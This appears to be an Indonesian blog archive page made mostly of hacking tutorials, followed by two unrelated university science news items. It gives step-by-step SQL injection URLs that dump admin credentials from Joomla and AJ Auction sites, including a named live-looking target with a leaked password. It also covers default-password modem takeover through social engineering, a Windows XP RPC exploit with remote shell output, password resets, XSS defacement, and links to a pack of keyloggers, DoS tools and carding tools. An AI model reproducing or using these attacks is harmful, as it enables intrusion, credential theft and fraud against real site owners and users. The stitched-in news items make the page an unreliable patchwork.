Indonesian Freebie Web and Graphic Designer Resources

Kamis, 09 Desember 2010

Implementasi SQL Injection pada Joomla

Implementasi SQL Injection pada Joomla

Posted by Admin on June 11, 2009 in Tutorial Hacking · 7 Comments

Implementasi SQL Injection pada Joomla web desain grafisApa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika 'the choosen one' ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.

Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja ...

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1

Implementasi SQL Injection pada Joomla web desain grafis
Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ' ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1'

Implementasi SQL Injection pada Joomla web desain grafis
Apa yang terjadi ? ... error...

Langkah selanjutnya adalah cari urutan si table 'dssyndicate_feeds' dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* --> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* --> errornya berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users

lihat paling akhir dari baris tersebut,
from+wc_users

wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,
Implementasi SQL Injection pada Joomla web desain grafis

Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.

Implementasi SQL Injection pada Joomla web desain grafis
Lihat angka 2 di dalam tag : <br /> <br /><title>2 (18)

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini ...

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users

Implementasi SQL Injection pada Joomla web desain grafis
perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :

5.0.33 (18)

Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D.

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut ...

admin (18)

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :

Implementasi SQL Injection pada Joomla web desain grafis
admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D. Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya ... :D.

Untuk keperluan eksperimen, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya
Peterpanz yang kerepotan ngurus skripsi juga :D, mr.freeman, for jojo too, najwa[at]STSN, dr.emi, denice the manace, Phii_, fadli


CD Hacking Tools 2010 – Gratis download

CD Hacking Tools ( Mirror was Updated )

XxxPass-Team 2007
Danger Cracking & Hacking Tools - Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di : Updated Links !!! Hacking tools 2007

http://rapidshare.com/files/85433778/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part1.rar
http://rapidshare.com/files/85426770/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part2.rar

Pass : XxxPass_DJ_haselking
Pass :-XxxPass_DJ_haselking

Hack ... hack ... hack the World !! :D
( Just for lamerz )


Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :



Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )



Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.



Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :



Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U



Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,



Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) | URL: / | Referrer: | Proxy: | Koneksi:



Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.







Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite



Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

// Greetz :



Special for mylovely, terima kasih infonya, ide-nya jadi makin bertambah.

Bscorpio, phii, dan ryuzaki, ninjaring, barudak STTTelematika Ciawi Bogor.

Fel_c, Mentari^, Abang Dennis the Manace

Allguys Echo Member, #khilafah, pepei dwipangga dan konco-konconya di liberationyouth.com, anak-anak saveusgue


Tekhnik Exploit Password WinXP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....

Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...

-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------

Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...

C:Documents and SettingsAl-k>net user

User accounts for \NOMATTER ------------------------------------------------------------------------------- Administrator Al-k GNU-- keluarga -- Guest HelpAssistant SUPPORT_388945a0 VUSR_NOMATTER The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited// Setelah itu masuk ke direktori di mana kaht berada

D:Data+ku_>

Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

D:Data+ku_>kaht 127.0.0.0 127.0.0.3_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4r@3wdesign.es #haxorcitos && #localhost @Efnet Ownz you!!! FULL VERSION? :) - AUTOHACKING ________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 34522 [+] Scan In Progress... - Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server... - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita buat akses user yang terbatas tadi menjadi Super User.



C:WINDOWSsystem32> net localgroup Administrators Al-k /add

The command completed successfully.



Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter.
Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (


ilmuwebsite.com

// Refferensi :
- Seni Tekhnik Hacking 1 [S’to]
- Echo Zine 10, Exploitasi Windows XP [mRt]
- Iseng Instink

// Greetz :
- y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned 1 by 1.
- Alumni SMAN4 Bogor & All guy’s in STTTelematika Ciawi Bogor.
- Special for Jheseecka & Melati “Mel, ini artikel ke 1 dan ke 2-nya !!! :)“
- hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
- Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase


Sedikit penjelasan mengenai XSS vulnerability

Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=



http://www.malesbanget.com/kamus/definisi.php?kata=

kemudian tekan enter ...
kemudian akan muncul popup baru berisi 'Tes, XSS-nya masih bisa'

Terus ... ???
Masih banyak tag html yang bisa kita gunakan, tanya deh mamang Google. :)

contoh lainnya adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

Hacked by Me



Cuma gitu doang ???
Iya... segitu dulu aja entar di lanjut lagi. Tunggu aja. :)

ilmuwebsite.com


SQL Injection AJ Auction seluruh versi

SQL Injection pada Aj Auction untuk seluruh versi.

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett ...
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel ...

hehehehe ... deface deface ...


Jadi root di linux tanpa password

Jadi root di linux tanpa harus menggunakan password

Boot Linux tanpa Password
Melalui mode single pada GRUB

Hi, ketemu lagi dengan saya, sikeren Al-k. ;)
Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password,
tapi kali ini saya akan menjelaskannya pada Linux.
Mungkin pada artikel yang lain telah di jelaskan bagaimana
cara melakukan login tanpa password dengan bootloader Lilo,
tapi kali ini saya akan menjelaskannya pada bootloader Grub.


Beginilah caranya ...

1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.
Pilih, yang Redhat Linux, terus tekan e di keyboard.
Tombol e berguna untuk melakukan edit.

2.) http://h1.ripway.com/alk/grub.png
setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba ...
tekan e dikeyboard

3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini

kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single

setelah itu Escape.

4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa
pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru atau anda bisa
mengedit file /etc/shadow, untuk menghilangkan password pada root.

Jreng jreng jreng ... satu lagi, anda login sebagai administrator tanpa password

// Greetz :

- Fel_c, Mentari^, BLACK.SCORPIO, Zahra_Fakhrunisa, Lady_Sizuka, Upie, Ipank
- Allguys in #khilafah, http://www.jcunited.tk


4 Senyawa Baru Murbei Temuan Ferlinahayati

JAKARTA - Penelitian Ferlinahayati terkait fitokimia dan sifat sitotoksik senyawa turunan fenol pada Morus, atau yang biasa dikenal masyarakat sebagai tanaman murbei mengantarkannya menjadi seorang doktor.

Dengan menemukan empat senyawa baru dan menjabarkan beberapa senyawa yang memiliki sifat toksisitas terhadap sel murine leukemia P-388, beliau berhasil mempertahankan disertasinya yang berjudul "Fitokimia dan Sifat Sitotoksik Senyawa Turunan Fenol dari Genus Morus yang Tumbuh di Jawa Barat" pada Sidang Terbuka Program Doktor yang diselenggarakan oleh Sekolah Pascasarjana ITB, belum lama ini di Gedung Annex ITB.

Ketertarikan terhadap keunikan struktur dan berbagai aktivitas yang terdapat dalam senyawa turunan fenol dari Morus melatarbelakangi Ferlinahayati mengkaji tanaman Morus, khususnya Morus asal Jawa Barat, lebih dalam.

Pada beberapa penelitian Morus memiliki aktivitas sitotoksik, antinematodal, antiviral, antiagregasi platelet dan antiinflamasi. Penelitian disertasi Ferlinahayati mengkhususkan pengkajian fitokimia dan sifat toksisitas pada tanaman yang biasa menjadi pakan ulat sutra ini.

"Penelitian disertasi ini dilakukan dengan menggunakan tiga spesies tumbuhan Morus yaitu M australis Poir, M. nigra Linn, M. alba Linn yang merupakan spesies Morus di daerah Jawa Barat, serta dikaji pula sifat sitotoksik senyawa-senyawa yang berhasil diisolasi terhadap sel murine leukemia P-388," ujar Ferlinahayati.

Melalui penelitiannya di Prodi Kimia FMIPA ITB, dia berhasil mengisolasi 24 senyawa turunan fenol dengan empat senyawa baru dari Morus, serta memperoleh beberapa senyawa turunan yang aktif sitotoksik terhadap sel murine leukemia P-388.

Menurut promovenda yang dipromotori oleh Prof Dr Euis Holisotan Hakim, serta ko-promotor Prof Dr Yana Maolana Syah dan Dr Lia Dewi Juliawaty ini, penemuan empat senyawa baru yakni 6,3'-O-dimetilmorasin M (1) (golongan 2-arilbenzofuran), 5,7,2',4' -tetrahidroksi- 3 -metoksiflavon (2) (golongan flavonoid jenis flavonol), 7-epialboktalol (3) (dimer stilben) dan morunigrin (4) (gabungan stilben-arilbenzofuran) telah menghasilkan pemahaman baru pada fitokimia genus Morus.

Lebih lanjut ia menjelaskan, penemuan 20 senyawa lainnya mempertegas kemampuan genus ini untuk memproduksi beragam senyawa turunan fenol.

Selain itu, hasil penelitian juga menunjukkan adanya peningkatan sitotoksisitas terhadap sel murine leukemia P-388 senyawa hasil isolasi dengan keberadaan gugus isoprenil pada posisi C-3 dari senyawa flavon.

Sidang yang juga dihadiri Dekan Sekolah Pascasarjana ITB Prof. Dr. Ir. Ofyar Z. Tamin berakhir dengan begitu membanggakan ketika Prof. Dody Sutarno, Ph.D, selaku ketua sidang mengumumkan bahwa Ferlinahayati berhasil mempromosikan gelar doktornya dengan predikat cum laude.(rhs)


Prof Siti Kembangkan Teknik Biologi Molekuler

BIOTEKNOLOGI modern di bidang pertanian sudah banyak dilakukan. Sebagai teknologi baru yang menggunakan teknik-teknik biologi molekuler dan rekayasa genetika, mampu untuk mengelola kesehatan tanaman, mengoptimalkan hasil produksi, dan mengurangi penggunaan pestisida.

Khusus untuk bioteknologi perlindungan tanaman (Biotek Perlintan), saat ini telah mengalami perkembangan yang sangat pesat dan banyak memberikan manfaat dalam mempertahankan dan meningkatkan produksi. Biotek Perlintan terdiri atas tiga aspek pokok, yakni diagnosis atau identifikasi organisme pengganggu tanaman (OPT), interaksi OPT dengan tanaman inang dan lingkungan, serta pengendalian OPT.

Melalui teknik-teknik biologi molekuler, OPT dapat diidentifikasi dan dideteksi secara lebih akurat untuk kepentingan diagnosis yang tepat dan cepat. "Teknik-teknik biologi molekuler ini sangat membantu dalam memahami perkembangan infeksi suatu penyakit dalam tanaman inangnya maupun pengaruh faktor lingkungan terhadap kejadian, keparahan serangan dan penyebaran suatu OPT," papar Prof Dr Ir Siti Subandiyah, di Balai Senat, saat dikukuhkan sebagai Guru Besar Fakultas Pertanian UGM, Rabu 23 Juni lalu,dalam keterangan tertulis UGM, di Jakarta, Kamis 24 Juni.

Selain itu, dihasilkan pula manipulasi genetika terhadap musuh alami, jasad antagonis, dan struktur komunitas biologis sehingga menghasilkan lingkungan biotik dan abiotik yang mampu menekan perkembangan OPT dengan lebih efektif.

"Kendala paling signifikan terhadap produksi buah-buahan di lapangan adalah masalah OPT. Permasalahan OPT ini menyebabkan menurunnya jumlah produksi secara kualitas dan kuantitas," tuturnya.

Menurut Siti Subandiyah, berbagai penyakit tanaman yang semula tidak diketahui identitas patogennya karena tidak dapat diisolasi pada medium buatan menjadi terungkap dengan menggunakan teknik identifikasi molekuler.

